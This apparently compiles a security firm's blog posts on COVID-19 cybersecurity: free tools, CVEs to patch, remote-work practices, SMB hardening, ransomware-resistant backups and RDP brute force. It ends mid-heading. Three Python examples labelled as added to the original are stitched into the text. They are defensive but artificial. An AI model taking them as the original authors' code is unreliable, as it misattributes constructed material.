The Definitive Guide to Free Cybersecurity Resources During COVID-19 Pandemic
COVID-19 has transformed the world in a matter of weeks. Many people now work from home for the first time, relying on the latest tools to connect with their employers, colleagues, and clients.
Sadly, cybercriminals are still exploiting weaknesses and targeting vulnerable people with scams. Fake government websites and messages have been reported, tricking users searching for official information in a time of profound unease.
As more people are cut off from their usual working environments, they may be unsure how to stay safe online. Fortunately, Canadian businesses can take advantage of free cybersecurity resources and defend themselves during the COVID-19 crisis.
In this guide, we explore the most valuable websites and tools available right now.
Cybersecurity Informational Resources for Businesses
Employees who are new to working from home can struggle to adapt to monitoring their own cybersecurity and taking effective precautions. The first step is to read the right information.
Canadian businesses looking to protect their infrastructure and employees during the COVID-19 upheaval can share the following resources with their teams to help them safeguard their own hardware and software at home:
Canadian Anti-Fraud Centre
This may have been your first port of call, but if not, the Canadian Anti-Fraud Centre is packed with helpful insights.
For example, there’s an in-depth list of reported scams to be aware of, including people posing as charities, cleaning companies, the Public Health Agency of Canada, Red Cross, and government departments. Check the list regularly to stay up to date on the latest scams.
It also provides tips on how to protect yourself and your business against online dangers. It’s never been more important to stay vigilant.
Canadian Centre for Cyber Security
The Canadian Centre for Cyber Security is another crucial resource for businesses. It features a fantastic guide — ‘Staying cyber-healthy during COVID-19 isolation’ — which links to several eye-opening articles on phishing, spotting malicious emails, and updating software & devices to mitigate risks.
National Institute of Standards and Technology (NIST)
NIST operates an outstanding Small Business Cybersecurity Corner, covering everything from Cybersecurity Resources Roadmaps to Cybersecurity Framework Steps for Small Manufacturers.
There’s a Telework Cybersecurity section with lots of resources for teams working from home, exploring such critical topics as Telework Security Basics and Mobile Device Security.
Cybersecurity News Updates
Businesses across Canada should try to stay well-informed on cybersecurity dangers and scams. The following sites are posting regular updates:
Free Cybersecurity Tools
Antivirus brand Sophos is offering free cybersecurity software for professional and personal use.
For as long as the COVID-19 crisis lasts, Sophos customers have free access to the Sophos Home Commercial Edition program, which delivers business-grade defense for all users.
On top of this, Sophos’ XG Firewall is available with a 90-day free trial. This provides automatic threat isolation and insights into hidden threats.
Click Armor is a Canadian security platform, and its “Can I Be Phished?” tool is a handy resource for all businesses and remote workers. It’s a user-friendly three-minute assessment designed to identify your ability to recognize phishing emails.
This invites users to choose emails they believe are suspicious, such as falsified HR policy updates, news alerts, and more. It may help employers and employees alike develop a stronger eye for spotting dangerous emails lurking in inboxes.
Qualys is providing Remote Endpoint Protection for remote workers. This is in response to the increased number of people now doing their jobs from home and is free for 60 days.
This gives users real-time visibility on all major weaknesses and issues (such as misconfigurations) that could put devices at risk.
DomainTools has built a free list of websites considered high-risk during the COVID-19 crisis, helping businesses to protect their systems, workers, and data against cybercriminals.
This tool provides access to the list after a brief registration process. The keyword-based, streamlined search function makes finding problem sites fast.
Users also can see when high-threat domains were created and the level of risk they pose (represented as a score for at-a-glance insights). The list includes tens of thousands of sites so far.
Canadian cybersecurity company 1Password has adjusted the pricing of its 1Password Business package so that companies now get their first six months free (instead of just 30 days). The company discussed its reasons for making the change in this blog post.
This tool enables businesses to centralize their login details in one space, with no need to memorize them or write them in notebooks which could go missing. Remote workers can access their business logins securely, increasing safety and reducing the amount of time they could waste by forgetting or misplacing their passwords.
Networking company Cisco is allowing its Cisco Umbrella customers to exceed their user limit for free, to accommodate the increase in employees working from home. Newcomers also have access to a free license, not just existing users.
Cisco’s offer applies to Duo Security, too, which is a two-factor authentication tool. It can be integrated into mobile or web apps, and prompts users to confirm their identity when trying to log in.
Cisco AnyConnect Secure Mobility Client is also included in the offer, which runs until July 1, 2020.
These are trying times for businesses of all sizes, but the strain may be particularly tough for smaller companies with tighter budgets. Taking advantage of these free cybersecurity resources and tools can help you stay safe online, even when cybercriminals are at their most ruthless.
At The Driz Group, we continue to provide our customers with cutting-edge managed services to prevent cyberattacks and protect applications. Schedule a free consultation to discuss your business’s cybersecurity options now.
Cybersecurity Risks Posed by COVID-19 Pandemic
The Canadian Centre for Cyber Security has warned that the COVID-19 pandemic poses an elevated level of risk to the cyber security of Canadian organizations involved in the response to the pandemic.
In a recently released alert, the Canadian Centre for Cyber Security said that the COVID-19 pandemic presents an elevated level of risk to cyber security, not just to the organizations in the medical and health sector but also to other Canadian businesses, particularly those with employees teleworking through VPNs. The Cyber Centre recommends that these high-risk organizations remain vigilant and take the time to ensure that they’re engaged in cyber defense best practices.
According to the Canadian Centre for Cyber Security, high-risk organizations should engage in cyber defence best practices in fighting against sophisticated threat actors and ransomware.
1. Sophisticated Threat Actors
The Cyber Centre said that sophisticated threat actors may target Canadian organizations involved in supporting the country’s response to the COVID-19 pandemic, which include organizations within the medical research community. The Cyber Centre said these sophisticated threat actors may attempt to steal data relating to the response to the pandemic, including ongoing key research towards a vaccine or other medical remedies, or other topics of interest to the threat actors.
2. Ransomware
Ransomware is a type of malicious software (malware) that encrypts victims’ computers or files, thereby locking out legitimate users and forcing the victims to pay ransom in exchange for the decryption keys that would unlock the computers or files.
According to the Canadian Centre for Cyber Security, the impact of a ransomware attack on Canadian organizations involved in supporting Canada’s response to the COVID-19 pandemic could be more devastating during the current pandemic than if it were to occur in a non-pandemic environment. Cyber criminals, the Cyber Centre said, may take advantage of the COVID-19 pandemic, exploiting the increased pressure being placed on Canadian health organizations to extract ransom payments.
Preventive and Mitigating Measures Against Cyber Threats Arising from the COVID-19 Pandemic
Here are some of the preventive and mitigating measures or cyber security best practices in these trying times:
Stay Aware of COVID-19 Phishing Campaigns
As of March 28, 2020, the Government of Canada reported 5,386 confirmed COVID-19 cases and 60 confirmed deaths. Globally, the World Health Organization (WHO) as of March 28, 2020 reported 571,678 confirmed COVID-19 cases and 26,494 confirmed deaths.
As this pandemic unfolds, people are hungry for information, and cyber criminals are taking advantage by launching phishing campaigns – cyber attacks that weaponize emails. In phishing campaigns, victims are tricked into opening emails that masquerade as coming from legitimate sources. These emails are in fact laden with malicious links or attachments that, once clicked, could install malware, including ransomware.
Increase Compromise Monitoring
High-risk organizations should increase monitoring in order to detect attempted compromises by sophisticated threat actors or ransomware attackers.
Employees who are now working from home as a result of the COVID-19 pandemic put a strain on your organization’s network. It’s important to monitor logs for malicious activity.
Follow the 3-2-1 Rule of Backups
3: Stands for keeping 3 copies of any important file: 1 primary and 2 backups.
2: Stands for keeping the files on 2 different media types to protect against different types of hazards.
1: Stands for storing 1 copy offsite that’s outside the organization’s facility.
Apply Patches to Critical Vulnerabilities
According to the Canadian Centre for Cyber Security, critical security vulnerabilities related to telework, also known as remote work, are of particular concern during the COVID-19 pandemic. As organizations rush to make more infrastructure available to remote users, such as virtual private network (VPN), unpatched software may be deployed, the Canadian Centre for Cyber Security said.
Over the past year, multiple critical vulnerabilities in VPN devices have been identified. Multiple successful exploitations of these critical vulnerabilities in VPN devices have also been reported, leading the Canadian Centre for Cyber Security to assess that these same VPN critical vulnerabilities “are likely to be leveraged for renewed compromise attempts over the short term”.
The Cyber Centre added that the critical security vulnerabilities listed below are among those that are likely to be targeted by malicious actors:
- CVE-2019-0708: This security vulnerability in Remote Desktop Services allows an attacker to execute arbitrary code on the affected Windows operating systems, enabling an attacker to install programs; view, change, or delete data; or create new accounts with full user rights.
- CVE-2019-19781: This security vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway could be exploited through a directory traversal attack against the /vpn directory of a vulnerable system.
- CVE-2020-0688: This remote code execution vulnerability exists in Microsoft Exchange Server when the server fails to properly create unique keys at install time.
- CVE-2020-0796: This remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploits this critical vulnerability could gain the ability to execute code on the target server or client.
- CVE-2020-1938: This critical security vulnerability in Apache Tomcat could allow attackers to access the Apache JServ Protocol (AJP) port by bypassing security checks based on client IP address and by bypassing user authentication if Tomcat was configured to trust authentication data provided by the reverse proxy.
It’s important to apply the available security patches and mitigating measures for the above-mentioned critical security vulnerabilities as soon as possible.
When you need help or are looking for cybersecurity advice, The Driz Group is providing complimentary cybersecurity advisory services and resources during the COVID-19 pandemic to help Canadian businesses stay safe.
How to Facilitate Secure Remote Work Arrangements
The Government of Canada, in an effort to contain and prevent further spread of the new coronavirus disease (COVID-19), has urged all Canadians to stay home and practice social distancing. In the work environment, this means that Canadian businesses are urged to facilitate “remote work arrangements”.
The World Health Organization (WHO) on March 11, 2020 assessed COVID-19 as a pandemic. As of March 21, 2020, the Government of Canada reported 1,231 confirmed cases of COVID-19 in Canada, with 13 deaths. Worldwide, as of March 22, 2020, WHO reported 267,013 confirmed cases of COVID-19 and 11,201 deaths in 185 countries or territories.
“During this extraordinary time, the Government of Canada is taking strong action to help Canadian businesses as COVID-19 is affecting them, their employees and their families,” the Government of Canada said. The Government has urged all Canadians to stay home unless it is absolutely essential to go out, and to practice social distancing and good hygiene. “For businesses, this means facilitating flexible and remote work arrangements,” the Government said.
What Is Remote Work Arrangement?
Remote work arrangement allows workers to work from home whenever and wherever possible. This arrangement limits the number of workers on-site, thereby contributing to the efforts to contain the COVID-19 outbreak and prevent further spread.
Remote work, also known as telework, is nothing new. While some sectors have adopted remote work, it hasn’t achieved wide adoption.
Based on 2016 data from Canada’s General Social Survey (GSS), 2.3 million paid workers, or 12.7% of Canada’s total workforce, telework at least an hour a week. Of those 2.3 million Canadians, more than 500,000 telework for more than 15 hours per week.
According to the 2016 GSS data, remote work in Canada is associated with occupations most connected to the knowledge economy: 36% of workers in the management sector, 24.3% in the education sector and 21.7% in the natural and applied sciences sector telework.
The sudden shift from office work to remote work arrangement as a way to contain and prevent further spread of COVID-19 has caught many employers and employees off guard.
Remote Work Challenges
In a remote work arrangement, there are 2 things that need protection: the devices (those used by the remote workers and those used by remote employers) and the communication link.
One of the challenges of remote work in light of the COVID-19 outbreak is the fact that many organizations are forced to allow their staff to use their personal desktops, laptops or mobile devices as organizations have been unprepared to issue official or organization-owned devices.
Allowing staff to use their personal computers is, in itself, a security issue. Some of the security issues arising from the use of personal computers include:
Organizations offering remote work arrangements face the same device security challenge. Organizations’ devices are at risk of unauthorized access, from malicious insiders to malicious outsiders. Outdated computers, such as servers running an outdated operating system, also pose a security threat, not just to the organization concerned but also to the remote workers allowed to access the organization’s devices remotely.
Best Practices in Facilitating Secure Remote Work Arrangement
Here are some of the best practices in facilitating secure remote work arrangement:
1. Practice Network Segmentation
Network segmentation refers to the practice of dividing your organization’s network into sub-networks. This practice ensures that in case one sub-network is compromised, the other sub-networks won’t be affected.
For the security of your organization’s network, it’s important to prevent non-IT remote workers from accessing your organization’s network.
For IT remote workers, network segmentation is especially important. With segmentation, the negligence or malicious actions of one remote worker who has access to a certain sub-network won’t affect the other sub-networks, especially those critical to the operation of your organization.
2. Use VPN
VPN, short for virtual private network, acts as a secure tunnel between two endpoints: the remote worker’s device and your organization’s server. For example, a remote worker can use this VPN to send encrypted data to your organization’s server.
It’s important to use multi-factor authentication for all VPN connections. This is particularly important because login credentials (VPN usernames and passwords) are sought after by cyber criminals. VPN login credentials are often stolen via phishing campaigns – campaigns that trick remote workers into clicking on malicious links or attachments in emails that masquerade as coming from legitimate sources.
Clicking on these malicious links or attachments could lead to malware that steals VPN login details being downloaded onto the remote worker’s device. Using multi-factor authentication on all VPN connections renders stolen login details useless on their own.
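The point above, that a phished VPN password is useless on its own once a second factor is required, as an added example that is not code from the original post or from any VPN vendor. It implements the RFC 6238 time-based one-time code (TOTP) and a login check that demands both a password and a current code. The user store, salt and PBKDF2 parameters are constructed for the example; the TOTP seed is the RFC's reference secret so the codes can be checked against the RFC's published test vectors.

```python
"""Second factor for VPN logins: added example, not code from the original post.

A stolen username and password pair is useless on its own when the login also
demands a time-based one-time code (TOTP, RFC 6238). The user store, salt and
PBKDF2 parameters below are constructed for the example; the TOTP seed is the
RFC 6238 reference secret so the codes can be checked against the RFC's
published vectors. A real VPN gateway would use its own user database and MFA
provider instead of this dict.
"""
import hashlib
import hmac
import struct
import time
from typing import Optional

TOTP_SECRET = b"12345678901234567890"           # RFC 6238 test secret (constructed use)
_SALT = b"example-salt-not-for-production"     # per-user random salt in real deployments
_ITERATIONS = 100_000


def _hash_password(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), _SALT, _ITERATIONS)


USERS = {"alice": {"pw_hash": _hash_password("correct horse battery staple"),
                   "totp_secret": TOTP_SECRET}}


def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238: HOTP (RFC 4226) over the 30-second time counter, HMAC-SHA1."""
    counter = int(unix_time) // step
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                                      # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def verify_totp(secret: bytes, candidate: str, unix_time: int, skew: int = 1) -> bool:
    """Accept the current step and `skew` steps either side to tolerate clock drift."""
    return any(hmac.compare_digest(totp(secret, unix_time + d * 30), candidate)
               for d in range(-skew, skew + 1))


def vpn_login(username: str, password: str, otp: str, unix_time: Optional[int] = None) -> bool:
    """Both factors must pass. A phished or stuffed password fails without a valid code."""
    user = USERS.get(username)
    if user is None:
        return False
    now = int(time.time()) if unix_time is None else unix_time
    password_ok = hmac.compare_digest(_hash_password(password), user["pw_hash"])
    otp_ok = verify_totp(user["totp_secret"], otp, now)
    return password_ok and otp_ok


if __name__ == "__main__":
    t = 59   # RFC 6238 vector: SHA1 TOTP at T=59 is 94287082, so the 6-digit code is 287082
    print("code:", totp(TOTP_SECRET, t))
    print("password alone:", vpn_login("alice", "correct horse battery staple", "000000", t))
    print("password + code:", vpn_login("alice", "correct horse battery staple", totp(TOTP_SECRET, t), t))
```

The one-step skew in `verify_totp` is the usual trade-off between tolerating client clock drift and widening the window an intercepted code stays valid; both comparisons use `hmac.compare_digest` so neither factor leaks timing information.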
3. Keep All Devices Up to Date
Always keep your organization’s devices up to date by using devices that receive regular security updates, and by applying security updates in a timely manner. Applying security updates on server operating systems and VPNs should be the top priority.
Vulnerabilities in server operating systems and VPNs have in the past been exploited by malicious actors as these two are seen as gateways to victims’ networks.
On behalf of all our staff, we wish you and your families well. During these challenging times, we are ready to help those who need assistance with minimizing IT and cybersecurity risks.
Need a few remote-working tips? Here are some work-from-home productivity tips from our management team:
1. Dress for success
Even though you are working from home, always dress as if you were going to work. We found that it helps to set a proper mood and supports motivation and demeanor.
2. Find a quiet spot
Kids and pets are fun, but you need to be 100% focused on the task at hand to be productive. Every minute of distraction may set you back an hour.
3. Plan your day
Plan as if you were in the office. Keep your calendar up to date and let your co-workers know when you are available and when you are not to avoid scheduling conflicts.
4. Take breaks
Coffee breaks and lunch are a must to stay rested and sharp. Even when you are working from home, your brain and your eyes still need rest.
5. Don’t check email
Well, most of us must check email, and we recommend checking your email twice a day to get more done. After all, if you are getting back to people the same day, it’s more than acceptable. If something is truly urgent, people will call you.
6. No social media
At least during business hours. Unless browsing social media is a part of your job, keep your mind focused and get more done.
Find the right apps and tools for your particular industry and spend the time automating as many menial tasks as possible. Many tools are free to use or cost very little yet save you a lot of time. If you don’t value your own time, no one else will.
Looking for cybersecurity and IT risk advice? Contact us today to speak with a cybersecurity expert. We offer complimentary advisory services to Canadian businesses of all sizes during the COVID-19 pandemic so that you and your organization remain safe.
How to Block Malicious SMB Traffic from Entering or Leaving Your Organization’s Network
In recent years, attackers have exploited vulnerabilities in SMB, short for Server Message Block, to get into their victims’ networks and to move data out of them.
What Is SMB?
SMB is a network file sharing and data architecture protocol that’s used by major operating systems such as Windows, MacOS and Linux. A client – referring to a computer used to access a server through a network – uses SMB to access data on a server. A server – referring to a computer that stores a wide variety of files such as application and data files – uses SMB for workloads like clustering and replication.
SMB was originally developed in the 80s by IBM. Microsoft adopted this protocol but made considerable modifications. Microsoft’s SMB protocol has since undergone 3 versions: Server Message Block (SMB) version 1 (SMBv1), SMB version 2 (SMBv2), and SMB version 3 (SMBv3).
The SMBv2 protocol was introduced in Windows Vista and Windows Server 2008, while the SMBv3 protocol was introduced in Windows 8 and Windows Server 2012. Microsoft publicly deprecated the SMBv1 protocol in 2014.
SMBv1 Security Vulnerability
Ned Pyle of Microsoft described SMBv1 as much like the original 1980s version, that is, built for a world that no longer exists – “a world without malicious actors, without vast sets of important data, without near-universal computer usage”.
According to Pyle, key protections offered by later SMB protocol versions aren’t found in SMBv1, including the following:
On March 14, 2017, Microsoft issued a security update, also known as a patch, fixing the vulnerability in SMBv1. According to Microsoft, this vulnerability could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.
Nearly 2 months after the release of the patch for SMBv1, on May 12, 2017, the WannaCry malicious software (malware) infected hundreds of thousands of computers worldwide. The group behind WannaCry exploited the security vulnerability in SMBv1.
SMBv3 Security Vulnerability
On March 12, 2020, Microsoft issued a patch for a security vulnerability in SMBv3. According to Microsoft, this security vulnerability, referred to as CVE-2020-0796, could allow an attacker to gain the ability to execute code on the target SMB server or SMB client.
Microsoft said that in order to exploit the vulnerability against an SMB server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 server. To exploit the vulnerability against an SMB Client, meanwhile, an unauthenticated attacker would need to configure a malicious SMBv3 Server and convince a user to connect to it.
The CVE-2020-0796 vulnerability exists in a new feature that was added in Windows 10 version 1903, and affects the following versions:
Cybersecurity Best Practices in Blocking Malicious SMB Traffic
Keeping your operating systems up to date and using only supported operating systems are two effective measures for blocking malicious SMB traffic.
In the case of the WannaCry attack, many of the infected computers had not applied Microsoft’s March 14, 2017 security update. It’s therefore important to keep your operating system up to date.
Other victims of the WannaCry attack were unsupported computers – those that no longer received security updates because they had reached their end of life or end of support. It’s important to use only operating systems that still receive regular security updates, that is, those that haven’t reached their end of life.
The high number of WannaCry victims showed that a large number of Windows users were running unsupported operating systems or hadn’t installed Microsoft’s March 14, 2017 security update.
For the SMBv3 security vulnerability CVE-2020-0796, Microsoft recommends the following mitigating measures:
According to Microsoft, blocking TCP port 445 at the network perimeter firewall will help protect systems behind that firewall from attempts to exploit the CVE-2020-0796 vulnerability. This mitigating measure helps avoid internet-based attacks – those that originate outside the enterprise perimeter. Failure to apply Microsoft’s March 12, 2020 security update, however, could still leave systems vulnerable to attacks from within the enterprise perimeter.
One workaround for the CVE-2020-0796 vulnerability, especially for organizations that can’t immediately apply the March 12, 2020 security update for operational reasons, is to disable SMBv3 compression.
Disabling SMBv3 compression with the PowerShell command below blocks unauthenticated attackers from exploiting the vulnerability against an SMBv3 server.
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force
Microsoft, however, warned that disabling SMBv3 compression doesn’t prevent the exploitation of SMB clients.
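The three mitigations in this section (perimeter blocking of TCP 445, retiring SMBv1, and patching or disabling compression for CVE-2020-0796) combined into one host assessment, as an added example that is not code from the original post or from Microsoft. The assessment works on a small snapshot dict so it runs anywhere; on Windows, `read_snapshot()` fills the registry-backed fields from the same LanmanServer Parameters key the PowerShell command above writes (the `SMB1` and `DisableCompression` values). The field names, the severities, and the choice to report a missing `SMB1` value as "verify with Get-WindowsOptionalFeature" are this example's own conventions; patch state and perimeter exposure are supplied by the caller because they are not registry facts.

```python
"""Host-side check for the SMB mitigations discussed above.

Added example; not code from the original post or from Microsoft. The assessment
works on a small snapshot dict so that it runs anywhere; on Windows,
read_snapshot() fills the registry-backed fields from the LanmanServer Parameters
key that the PowerShell command above writes. Field names, severities and the
"missing SMB1 value means verify" rule are this example's own conventions.
"""
import sys

LANMAN_PARAMS = r"SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters"


def _registry_dword(name):
    """Read a DWORD under LanmanServer\\Parameters; None if the value is absent.
    Windows only: winreg is part of the standard library there."""
    import winreg
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, LANMAN_PARAMS) as key:
            value, _ = winreg.QueryValueEx(key, name)
            return int(value)
    except FileNotFoundError:
        return None


def read_snapshot(cve_2020_0796_patched, port_445_open_to_internet):
    """Build a snapshot from the live registry. Patch state and perimeter exposure
    are not registry facts, so the caller supplies them (assumed inputs)."""
    if sys.platform != "win32":
        raise RuntimeError("live registry read is only available on Windows")
    smb1 = _registry_dword("SMB1")                       # 0 = SMBv1 server disabled
    return {
        "smb1_enabled": None if smb1 is None else smb1 != 0,
        "smbv3_compression_disabled": _registry_dword("DisableCompression") == 1,
        "cve_2020_0796_patched": cve_2020_0796_patched,
        "port_445_open_to_internet": port_445_open_to_internet,
    }


SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2, "info": 3}


def assess_smb(snapshot):
    """Return (severity, finding) tuples, most urgent first."""
    findings = []
    if snapshot["port_445_open_to_internet"]:
        findings.append(("high", "TCP 445 reachable from the internet: block it at the perimeter firewall"))
    if snapshot["smb1_enabled"] is None:
        findings.append(("info", "SMB1 registry value not set: confirm with "
                                 "Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol"))
    elif snapshot["smb1_enabled"]:
        findings.append(("high", "SMBv1 enabled (deprecated in 2014, abused by WannaCry): disable it"))
    if not snapshot["cve_2020_0796_patched"]:
        if snapshot["smbv3_compression_disabled"]:
            # The workaround protects the server role only; clients stay exposed until patched.
            findings.append(("medium", "CVE-2020-0796 unpatched: compression workaround covers the "
                                       "server role only, SMB clients stay exposed"))
        else:
            findings.append(("critical", "CVE-2020-0796 unpatched with SMBv3 compression on: apply the "
                                         "March 12, 2020 update or set DisableCompression=1"))
    return sorted(findings, key=lambda f: SEVERITY_ORDER[f[0]])


if __name__ == "__main__":
    # Constructed snapshot of an unpatched, internet-facing host (not a real system).
    example = {"smb1_enabled": True, "smbv3_compression_disabled": False,
               "cve_2020_0796_patched": False, "port_445_open_to_internet": True}
    for severity, text in assess_smb(example):
        print(f"[{severity}] {text}")
```

The "medium" finding is the caveat Microsoft attaches to the workaround: setting `DisableCompression` closes the server-side exposure but an SMB client on the same host remains vulnerable until the update is applied, so the finding only clears when `cve_2020_0796_patched` is true.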
How to Strengthen Cloud Backups Against Ransomware
Cloud backup is an important defense against ransomware attacks. Cloud backups, however, have recently been targeted by ransomware attackers.
In a ransomware attack, the computer or the data within is encrypted preventing users’ access to this computer or data. The lack of backups forces many victims to pay ransom in exchange for the decryption keys that would unlock these locked computers or locked data.
As many organizations have migrated their daily operations to the cloud, many have migrated their backups to the cloud as well. For many organizations, cloud backups have given them a false sense of security.
If not configured properly, cloud backups could easily be stolen, deleted and, in a worst-case scenario, used against your organization. The group behind the ransomware called “DoppelPaymer” recently published on their leak website the admin username and password for a Veeam user account owned by one of DoppelPaymer ransomware’s victims who refused to pay ransom.
Switzerland-based Veeam is a software company that develops cloud backup software. DoppelPaymer is the latest addition to the number of ransomware programs that establish leak websites to shame victims who refuse to pay ransom. Stolen data belonging to the victims prior to encryption are published on these leak websites.
"Cloud backups are a very good option against ransom but do not 100% protect as cloud backups are not always good configured, offline backups often outdated – the system of backups is really nice but human factor leaves some options," the group behind DoppelPaymer told Bleeping Computer.
How Cybercriminals Compromise Cloud Backups
Ransomware attackers often gain their initial foothold on victims’ computers through phishing campaigns or exposed RDP. In phishing campaigns, attackers trick victims into opening malicious emails containing malicious links or attachments. Opening these links or attachments could lead to the actual ransomware being downloaded onto the victims’ computers.
Exposed RDP is another gateway for ransomware attackers into victims’ networks. RDP, short for Remote Desktop Protocol, is a protocol developed by Microsoft that provides a user with a graphical interface to connect to another computer over a network connection. Exposed RDP endpoints – those that use weak passwords and lack multi-factor authentication, virtual private networks (VPNs) and other security measures – are targeted by cybercriminals as an initial entry point into their victims’ networks.
The group behind the ransomware called “Maze” told Bleeping Computer that cloud backups credentials are used to restore the victims’ data stored in the cloud to the servers under the group’s control. Maze ransomware started the trend among ransomware operators in establishing leak websites in order to shame victims who refuse to pay ransom.
"Yes, we download them [data stored in the cloud],” the group behind Maze ransomware told Bleeping Computer. “It is very useful. No need to search for sensitive information, it is definitely contained in backups. If backups in the cloud it is even easier, you just login to cloud and download it from your server, full invisibility to data breach detection software.”
Operators of the DoppelPaymer and Maze ransomware, however, didn’t elaborate to Bleeping Computer on how they gained access to their victims’ cloud backups. For users of the Veeam software for cloud backups, the role of Mimikatz and the practice of configuring Veeam to use Windows authentication could have led to the compromise of these cloud backups.
Once malicious actors gain access to their victims’ networks, they systematically move through the network, for instance, via the use of Mimikatz – an open-source application that allows attackers to view and save Windows authentication credentials. These stolen Windows authentication credentials are used by the attackers in accessing cloud backups that use the Veeam software as some administrators configure Veeam to use Windows authentication.
Cybersecurity Best Practices in Securing Your Organization’s Cloud Backups
In a white paper released by Veeam, the company said that one of the best practices in securing your organization’s cloud backups is through the use of different credentials for cloud backups. “One of the key characteristics of ransomware is its ability to propagate,” Veeam said. “By using different credentials within the Veeam infrastructure, we can introduce more resiliency by limiting propagation from other operating systems on the network. The best, broadest recommendation is to have at least two credential mechanisms in use. That can include both Windows and Linux accounts, Windows and Veeam Cloud Connect, etc.”
It’s also important to follow the time-tested 3-2-1 rule:
3: Keep 3 copies of any important file: 1 primary and 2 backups.
2: Keep the files on 2 different media types to protect against different types of hazards.
1: Store 1 copy offsite (for example, cloud backup).
Following the 3-2-1 rule, aside from cloud backup, it’s also important to keep a backup on-premise or on-site. This on-premise backup must be kept offline to ward off ransomware attackers. Aside from attacking cloud backups, ransomware attackers have targeted on-premise backups exposed to the internet.
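The 3-2-1 rule, the requirement above that the on-site backup stay offline, and Veeam's advice earlier in this post to use separate credentials for backup infrastructure, turned into a checker that runs over a backup inventory, as an added example that is not code from the original post or from Veeam. Each copy is a constructed dict with the fields `role`, `media`, `offsite`, `offline` and `credential`; those field names, the sample inventory and the `remediated()` fix-up are this example's own.

```python
"""3-2-1 backup inventory check.

Added example; not code from the original post or from Veeam. Each copy is a
constructed dict with the fields role, media, offsite, offline and credential
(field names are this example's own). The checker applies the 3-2-1 rule from
the text plus the two refinements the text adds: the on-site backup should be
kept offline, and backups should not share credentials with production.
"""

# Constructed inventory for a fictional file share; not real infrastructure.
INVENTORY = [
    {"name": "fileserver", "role": "primary", "media": "disk",  "offsite": False, "offline": False, "credential": "CORP\\fileadmin"},
    {"name": "nas-backup", "role": "backup",  "media": "nas",   "offsite": False, "offline": False, "credential": "CORP\\fileadmin"},
    {"name": "cloud-copy", "role": "backup",  "media": "cloud", "offsite": True,  "offline": False, "credential": "CORP\\fileadmin"},
]


def check_321(copies):
    """Return a list of violations; an empty list means the inventory passes."""
    problems = []
    backups = [c for c in copies if c["role"] == "backup"]
    primaries = [c for c in copies if c["role"] == "primary"]
    # 3: one primary plus two backups.
    if len(primaries) != 1 or len(backups) < 2:
        problems.append(f"rule 3: need 1 primary and 2 backups, found {len(primaries)} and {len(backups)}")
    # 2: at least two media types across all copies.
    if len({c["media"] for c in copies}) < 2:
        problems.append("rule 2: every copy is on the same media type")
    # 1: at least one backup held offsite.
    if not any(c["offsite"] for c in backups):
        problems.append("rule 1: no offsite backup")
    # Refinement from the text: keep an on-site backup, and keep it offline.
    onsite = [c for c in backups if not c["offsite"]]
    if not onsite:
        problems.append("no on-site backup to restore from quickly")
    elif not any(c["offline"] for c in onsite):
        problems.append("on-site backup is online: anything that reaches the network can reach it too")
    # Veeam's advice: backup credentials must differ from production credentials.
    prod_creds = {c["credential"] for c in primaries}
    shared = sorted(c["name"] for c in backups if c["credential"] in prod_creds)
    if shared:
        problems.append(f"backups sharing the production credential: {shared}")
    return problems


def remediated(copies):
    """Apply the two fixes the text calls for and return a new inventory."""
    fixed = [dict(c) for c in copies]
    for c in fixed:
        if c["role"] == "backup":
            c["credential"] = f"backup-svc-{c['media']}"   # assumed separate account per copy
            if not c["offsite"]:
                c["offline"] = True                          # e.g. detached or air-gapped media
    return fixed


if __name__ == "__main__":
    for problem in check_321(INVENTORY):
        print("FAIL:", problem)
    print("after remediation:", check_321(remediated(INVENTORY)) or "passes 3-2-1")
```

The sample inventory satisfies the literal 3-2-1 counts yet still fails twice: its on-site copy is reachable from the network, and every copy is reachable with the same domain account, which is exactly the condition under which credentials captured on a production host unlock the backups as well.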
In the past few months, ransomware attackers have targeted Network Attached Storage (NAS) devices. NAS is a storage and backup system that consists of one or more hard drives.
To gain access to NAS devices, attackers use brute force attacks, that is, guessing the correct username and password combination through trial and error. Attackers also exploit security vulnerabilities that remain unpatched, either because the vendor has not released a security update or because the NAS device’s owner failed to install the vendor’s available security update in a timely manner.
When you need help securing your cloud backups and applications against ransomware attacks, our experts are here to help. Get in touch with us today and protect your valuable assets.
Why Single Factor Authentication Isn’t Enough to Protect Your Organization’s Network
Many of today’s cyberattacks have been successful, not because of advanced technology but because of one often ignored fact: the use of single factor authentication.
What Is Single Factor Authentication?
Single factor authentication is a cybersecurity measure that relies on the use of a username and password pair. While single factor authentication is commonly used for email, it is also common as a perceived defensive measure for protecting endpoints – devices such as desktops and laptops that connect to a computer network and communicate back and forth with the network’s resources.
RDP Brute-Force Attacks
Single factor authentication has, surprisingly, been used as a defensive measure in protecting RDP, short for Remote Desktop Protocol. RDP, a proprietary protocol developed by Microsoft, provides users with a graphical interface to connect to another computer over a network connection. In brute-forcing RDP, a malicious actor attempts to sign in with an administrator account by guessing the correct username and password combination through trial and error. By successfully guessing the correct combination, a malicious actor can gain access to the target computer and conduct further malicious activities such as stealing data, dropping ransomware, or using the compromised computer for cryptocurrency mining.
In the blog post "Data science for cybersecurity: A probabilistic time series model for detecting RDP inbound brute force attacks", published in December 2019, the Microsoft Defender ATP Research Team reported that, out of nearly 45,000 computers that had RDP reachable from a public IP address and at least one failed network sign-in, several hundred per day on average had a high probability of experiencing one or more RDP brute-force attempts.
API Credential Stuffing Attacks
